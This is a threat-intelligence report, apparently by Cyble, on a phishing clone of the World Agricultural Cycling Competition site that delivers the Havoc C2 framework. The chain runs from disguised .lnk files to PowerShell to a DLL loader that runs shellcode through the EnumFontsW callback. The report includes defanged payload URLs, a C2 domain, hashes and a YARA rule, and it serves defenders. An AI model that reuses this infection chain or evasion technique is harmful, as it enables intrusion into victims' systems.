Key Takeaways

• Cyble Research and Intelligence Labs (CRIL) recently identified a phishing site that closely mimics the official website of the World Agricultural Cycling Competition (WACC).
• This deceptive site was crafted by a Threat Actor (TA) who replicated the legitimate WACC site with only minor modifications, making it challenging for unsuspecting visitors to differentiate between the two.
• The World Agricultural Cycling Competition is an event held in France that aims to bridge the gap between the agriculture and sports industries. The timing and context suggest that the TA is likely targeting stakeholders and participants within this specific region and sector, aiming to exploit the event’s popularity and relevance.
• The phishing campaign was deliberately launched in July 2024, shortly after the real cycling event concluded in June. By capitalizing on the event’s recent conclusion, the TA added a “PHOTO” section to the phishing site, enticing visitors with the promise of event photos and thereby luring those associated with or interested in the competition.
• To further their malicious agenda, the TA lures users into downloading a ZIP file that allegedly contains event photos. However, instead of images, the ZIP file harbors three shortcut files (.lnk) disguised as images. When executed, these shortcuts trigger a sophisticated infection chain that ultimately delivers a Havoc C2.
• Once the Havoc C2 is executed, it attempts to establish communication with an Azure Front Door domain. This domain is likely being used as a redirector, serving as an intermediary that reroutes traffic to the actual Command and Control (C&C) server, where the TA can execute further malicious activities.

Overview

CRIL has identified a phishing site hosted at “wacc[.]photo” that is masquerading as the official website for the World Agricultural Cycling Competition. The TA responsible for this phishing site has cloned the legitimate website, making only minor alterations to its content. The real cycling event took place from June 7th to 9th, after which the TA launched their attack campaign.

The TA added a new section titled “PHOTO,” claiming to offer event photos to lure visitors. This addition appears to be a strategic move aimed at targeting individuals associated with the event who might be eager to view or download these photos. The Figure below illustrates the appearance of the phishing site.

The figure below illustrates the new section added by the TA, which offers the option to download a malicious ZIP file disguised as event photos.

The ZIP file in question contains three shortcut files (.lnk) that are disguised as images. When a user clicks on any of these shortcuts, a PowerShell script is executed. This script is designed to download legitimate images and display them using the Edge browser, thereby maintaining the illusion of authenticity. However, the script also downloads and executes a malicious DLL file in the background.

This DLL acts as a loader and loads shellcode that is responsible for loading the Havoc C2. Havoc is a sophisticated post-exploitation Command and Control (C&C) framework. Once deployed, the Havoc C2 attempts to connect to an Azure Front Door domain, which the TA likely uses as a redirector to the actual C&C server. During the analysis, it was observed that the C&C server was down, which hindered the ability to fully analyze the subsequent stages of the attack.

This phishing site also hosts an open directory containing various malware payloads used to deliver Havoc. The TA may be swapping out payloads to better target their victims.

Technical Analysis

The initial infection begins when a user downloads a ZIP file from a phishing site. This ZIP file contains three shortcut files disguised with .jpg extensions to appear as image files, as depicted in the figure below.

Each of these shortcut files is designed to execute the same operation. Upon execution, they utilize conhost.exe to run a PowerShell script. This script initially downloads a legitimate JPG file using the Start-Bitstransfer command, which serves as a decoy. Specifically:

• 1.jpg.lnk downloads from hxxps[:]//wacc.photo/wp-content/uploads/2024/1.jpg
• 2.jpg.lnk downloads from hxxps[:]//wacc.photo/wp-content/uploads/2024/2.jpg
• 3.jpg.lnk downloads from hxxps[:]//wacc.photo/wp-content/uploads/2024/3.jpg

These decoy images are placed in the “AppData\Local” directory. Subsequently, the script uses Microsoft Edge to open these images with the following command:

• cmd.”exe /C ‘C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe’ C:\Users\User_Name\AppData\Local\[image_name].jpg;

The figure below shows the decoy image.

The PowerShell script for downloading and displaying the decoy images is illustrated in the figure below.

After this, the PowerShell script downloads a DLL file from “hxxps[:]//wacc.photo/wp-content/uploads/2024/KB.crdownload” and saves it in the Downloads folder, naming it “KB.part.” Then, it moves this file to “AppDataLocal” and names it “KB.DLL.” Then, it uses the Unblockcommand to allow the execution of the downloaded file. The figure below shows the PowerShell script for downloading DLL.

Now, this PowerShell script loads the “KB.DLL” into its process and then invokes the Run method within the DLL to initiate its execution. The figure below shows the code for loading the DLL file.

This “KB.DLL” is a shellcode loader. It contains obfuscated shellcode and a dictionary of words mapped to bytes. A function named DecodeWordsToBytes() reverses this data, converting the words back into their original byte values.

After de-obfuscating the shellcode, the ExecuteShellcode() method is called to execute it. This method allocates executable memory, copies the shellcode into it, and then exploits the EnumFontsW() function to run the shellcode under the pretext of enumerating fonts. Since EnumFontsW() is a callback function, the pointer to the shellcode is passed to it for execution. The method then cleans up by releasing the device context. This is a common technique used in malware to execute payloads while attempting to avoid detection. The shellcode contains an embedded executable, as shown in the figure below.

This shellcode, upon execution, searches for the PE header as depicted in the figure below. Embedded within the shellcode is a HAVOC C2, which is loaded and designed to establish a connection to the domain egzklpzltbptmgnnevne[.]azurefd.net. This domain is linked to Azure Front Door, a content delivery network (CDN) service offered by Microsoft Azure. TAs have previously been observed abusing similar legitimate services to evade detection. At the time of analysis, this domain was down, which prevented further investigation of subsequent stages.  

Conclusion

This attack seems to have been deliberately aimed at the French agricultural sector. Although the command and control (C&C) server was inactive during the analysis, preventing a complete understanding of the threat actor’s objectives, there are several potential implications based on the infection chain that was observed.

The deployment of the Havoc indicates that the TA likely intended to carry out extensive and sophisticated operations. Havoc, as a post-exploitation framework, is capable of enabling a range of malicious activities. These could include lateral movement within the compromised network, allowing the attacker to infiltrate additional systems, establishing persistence to ensure long-term access, and deploying further malware payloads to deepen the compromise or achieve specific goals. The sophistication of the Havoc framework suggests that the attacker was well-prepared and potentially had a strategic interest in compromising systems within the French agricultural industry.

Our Recommendations

• The TA has created a phishing site posing as Waac. To protect yourself, verify the legitimacy of websites by scrutinizing URLs and avoiding suspicious links. 
• Conduct training sessions to educate users on recognizing phishing attempts and the risks of downloading files from untrusted sources. Emphasize the importance of verifying the legitimacy of websites and links before interaction.
• Configure PowerShell execution policies to restrict the running of scripts from untrusted sources. Use tools like PowerShell Constrained Language Mode to limit PowerShell capabilities and reduce the risk of malicious script execution.
•  Deploy advanced endpoint protection solutions that can detect and block malicious DLLs and scripts. Ensure that the antivirus and antimalware software used by your firm is up-to-date and configured to scan for potentially harmful files.
• Set up network monitoring to detect unusual traffic patterns, such as connections to suspicious domains or unexpected communications with Azure Front Door domains. Investigate any anomalies promptly.

MITRE ATT&CK® Techniques

Tactic	Technique	Procedure
Initial Access (TA0001)	Phishing (T1566)	Uses phishing website.
Execution (TA0002)	User Execution: Malicious File (T1204.002)	The user executes a .LNK file disguised as an image.
Execution (TA0002)	Command and Scripting Interpreter: PowerShell (T1059.001)	Embedded PowerShell commands executed
Defense Evasion (TA0005)	Masquerading: Masquerade File Type (T1036.008)	LNK file disguised as a JPG file
Defense Evasion (TA0005)	Obfuscated Files or Information (T1027)	Contains obfuscated shellcode.
Command and Control (TA0011)	Application Layer Protocol: Web Protocols (T1071.001)	Uses HTTP to communicate.

Indicators of Compromise (IOCs)

Indicators	Indicator Type	Description
7566a8bce13dcbf1137b44776711ac2c471cf54a8bd7891c5b00b091f2aaa796	SHA256	GAGNANTS_CONCOURS_2024.zip
da9122c56c0da8f4e336f811435783b22994a9109162f3be6558aed7ac1c08da	SHA256	1.jpg.lnk
3a169ce08fa1ab70f452c2bdfe3638805579a5cca1b45eb8ce81f68c98c932da	SHA256	2.jpg.lnk
43cfef5db47162dda0c11320d3fcee76ef83308a7d0b7c9afd16c8dd974834a7	SHA256	3.jpg.lnk
d9b4ed0f77045b79989b31fa32fdb1b461e9602d0c150a4052f9ae6a79a98ff5	SHA256	KB.dll

Yara Rule

rule Loader_Havoc{

    meta:

        author = “Cyble Research and Intelligence Labs”

        description = “Detects Dll loader used to deliver Havoc payload”

        date = “2024-08-14”

        os = “Windows”

    strings:

        $a1  = “ExecuteShellcode” fullword ascii

        $a2  = “GetDCEx” fullword ascii

        $a3  = “EnumFontsW” fullword ascii

        $a4  = “ReleaseDC” fullword ascii

    condition:

        uint16(0) == 0x5A4D and all of them

}

Related